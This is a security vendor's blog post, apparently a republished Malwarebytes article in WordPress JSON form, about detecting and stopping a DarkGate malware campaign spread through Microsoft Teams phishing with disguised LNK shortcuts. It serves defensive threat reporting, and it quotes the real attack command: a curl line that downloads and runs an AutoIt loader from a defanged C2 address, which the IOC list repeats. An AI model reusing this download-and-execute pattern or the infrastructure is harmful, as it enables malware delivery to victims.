{"id":23259,"date":"2023-10-30T16:11:42","date_gmt":"2023-10-31T00:11:42","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2023\/10\/30\/news-16989\/"},"modified":"2023-10-30T16:11:42","modified_gmt":"2023-10-31T00:11:42","slug":"news-16989","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2023\/10\/30\/news-16989\/","title":{"rendered":"Battling a new DarkGate malware campaign with Malwarebytes MDR"},"content":{"rendered":"\n<p>First publicly reported in 2018,<a href=\"https:\/\/www.malwarebytes.com\/blog\/threat-intelligence\/2023\/08\/darkgate-reloaded-via-malvertising-campaigns\">&nbsp;DarkGate is a Windows-based malware<\/a>&nbsp;with a wide-range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however,&nbsp;<a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2023\/09\/microsoft-teams-used-to-deliver-darkgate-loader-malware\">researchers at Trusec found evidence<\/a>&nbsp;of a campaign using external Teams messages to deliver the DarkGate Loader.<\/p>\n<p>On September 13th, 2023, the&nbsp;<a href=\"https:\/\/www.malwarebytes.com\/business\/managed-detection-and-response\">Malwarebytes MDR&nbsp;<\/a>team spotted the same campaign on a client network.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-the-initial-incident\">The Initial Incident<\/h2>\n<p>The threat began as a phishing attempt via Microsoft Teams. The attackers sent a malicious ZIP file named &#8220;<strong>C_onfidential Sign_ificant Company Changes.zip<\/strong>&#8221; (the names may vary in different iterations of the attack).<\/p>\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1400\" height=\"847\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2023\/10\/image-13.png?w=1024\" alt=\"\" class=\"wp-image-94791\" \/><\/figure>\n<p>Phishing message sent to targets via Microsoft Teams in the same DarkGate campaign. Image: Truesec<\/p>\n<p>A number of employees clicked on this file believing it to be legitimate. Inside this ZIP file, however, were several malicious shortcut files, or LNK files, that were disguised as PDF documents.<\/p>\n<p>The names of these LNK files included &#8220;<strong>EMPLOYEES_AFFECTED_BY_TRANSITION.PDF.LNK&#8221;<\/strong>&nbsp;and &#8220;<strong>COMPANY_TRANSFORMATIONS.PDF.LNK<\/strong>&#8220;.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-the-malicious-command\">The Malicious Command<\/h2>\n<p>When employees clicked on these shortcuts, it triggered a malicious command line. Its purpose? To download and run a harmful script from a remote IP address. Fortunately, Malwarebytes EDR recognized this IP as a &#8216;Known bad&#8217; destination and blocked it.<\/p>\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1136\" height=\"582\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2023\/10\/image-14.png?w=1024\" alt=\"\" class=\"wp-image-94792\" \/><\/figure>\n<p>Multiple attempts to execute processes such as curl commands<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-darkgate-loader-the-culprit\">DarkGate Loader &#8211; The Culprit<\/h2>\n<p>As the MDR team delved deeper into the incident, they discovered that this was not a random attack. It was connected to a known malware attack campaign using Teams phishing to install DarkGate Loader. The use of the curl command is to fetch and deposit malicious files onto the victim&#8217;s machine:&#8221;C:WindowsSystem32cmd.exe&#8221; \/k curl -# -o<\/p>\n<pre class=\"wp-block-code\"><code>\"C:WindowsSystem32cmd.exe\" \/k curl -# -o  \"C:Users&#091;Redacted]AppDataLocalTempAutoit3.exe\" \"  http:\/\/5&#091;.]188&#091;.]87&#091;.]58:2351\" -o  \"C:Users&#091;Redacted]AppDataLocalTempbtbgvbyy.au3\"  \"http:\/\/5&#091;.]188&#091;.]87&#091;.]58:2351\/msibtbgvbyy\" \"C:Users&#091;Redacted]AppDataLocalTempAutoit3.exe\"  \"C:Users&#091;Redacted]AppDataLocalTempbtbgvbyy.au3\" &amp; exit<\/code><\/pre>\n<p>The malicious command attempts to run an AutoIt script (<strong>btbgvbyy.au3<\/strong>). Director of Threat Intelligence Jerome Segura notes the use of AutoIt, a legitimate scripting language, was already present in the very early versions of DarkGate.<\/p>\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1445\" height=\"494\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2023\/10\/image-15.png?w=1024\" alt=\"\" class=\"wp-image-94793\" \/><\/figure>\n<p>Malwarebytes EDR recognizing suspicious AutoIt activity<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"456\" height=\"492\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2023\/10\/image-16.png\" alt=\"\" class=\"wp-image-94794\" \/><\/figure>\n<p>Infected system exhibiting Indicators of Compromise (IOCs)<\/p>\n<p>Recognizing the gravity of the situation, the team began collecting Indicators of Compromise (IOCs). This included hashes of the ZIP file, its contents, and samples of the malevolent script initiated by the shortcuts.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-actions-taken\">Actions Taken<\/h2>\n<p>Swift action was taken by isolating the affected machines. Although Malwarebytes EDR had already blocked the malicious IP, the MDR team took extra precautions, ensuring that no persistence mechanisms were present on the endpoints, which could have given attackers a backdoor to the system.<\/p>\n<p>The MDR team also suggested blocking the download of files from external accounts in Microsoft Teams, which was the primary attack vector in this campaign.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-lessons-from-the-incident\">Lessons from the Incident<\/h2>\n<p>By using a combination of&nbsp;evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. If the infection had continued, the company could have faced potential data breaches, operational disruptions, financial losses, and more.<\/p>\n<p>Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the DarkGate&nbsp;malware and safeguarded the customer\u2019s digital environment against possible reinfection.<\/p>\n<p>Learn more about how Malwarebytes MDR today can help secure your organization:&nbsp;<a href=\"https:\/\/try.malwarebytes.com\/mdr-consultation-new\/\">https:\/\/try.malwarebytes.com\/mdr-consultation-new\/<\/a><\/p>\n<div class=\"wp-block-malware-bytes-button mb-button\" id=\"mb-button-29dae385-3cb2-439d-9781-06079be202fc\">\n<div class=\"mb-button__row u-justify-content-center\">\n<div class=\"mb-button__item mb-button-item-0\">\n<p class=\"btn-main\"><a href=\"https:\/\/try.malwarebytes.com\/mdr-consultation-new\/\">GET A\u00a0MALWAREBYTES MDR QUOTE<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:<\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/05\/tracking-down-a-trojan-an-inside-look-at-threat-hunting-in-a-corporate-network\">Tracking down a trojan: An inside look at threat hunting in a corporate network<\/a><\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/06\/understanding-ransomware-reinfection-an-mdr-case-study\">Understanding ransomware reinfection: An MDR case study<\/a><\/p>\n<h2 class=\"wp-block-heading\" id=\"h-indicators-of-compromise-ioc\">Indicators of Compromise (IoC)<\/h2>\n<h3 class=\"wp-block-heading\" id=\"h-file-details\">File Details:<\/h3>\n<pre class=\"wp-block-code\"><code>Filename: C_onfidential Sign_ificant Company Changes.zip Reported At: 09\/13\/2023 9:57:56 AM<\/code><\/pre>\n<h3 class=\"wp-block-heading\" id=\"h-network-indicators\">Network Indicators:<\/h3>\n<pre class=\"wp-block-code\"><code>C2 IP Address: 5&#091;.]188&#091;.]87&#091;.]58<\/code><\/pre>\n<h3 class=\"wp-block-heading\" id=\"h-malicious-urls\">Malicious URLs:<\/h3>\n<pre class=\"wp-block-code\"><code><a href=\"http:\/\/0.0.0.5\/\">http:\/\/5<\/a>&#091;.]188&#091;.]87&#091;.]58:2351 <a href=\"http:\/\/0.0.0.5\/\">http:\/\/5<\/a>&#091;.]188&#091;.]87&#091;.]58:2351\/msibtbgvbyy<\/code><\/pre>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/business\/2023\/10\/on-the-frontlines-battling-an-in-the-wild-darkgate-infection-with-malwarebytes-mdr\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p> First publicly reported in 2018,&#160;DarkGate is a Windows-based malware&#160;with a wide-range of capabilities including credential stealing and remote access to victim&#8230; <\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[1001],"class_list":["post-23259","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-business"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/23259","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=23259"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/23259\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=23259"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=23259"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=23259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}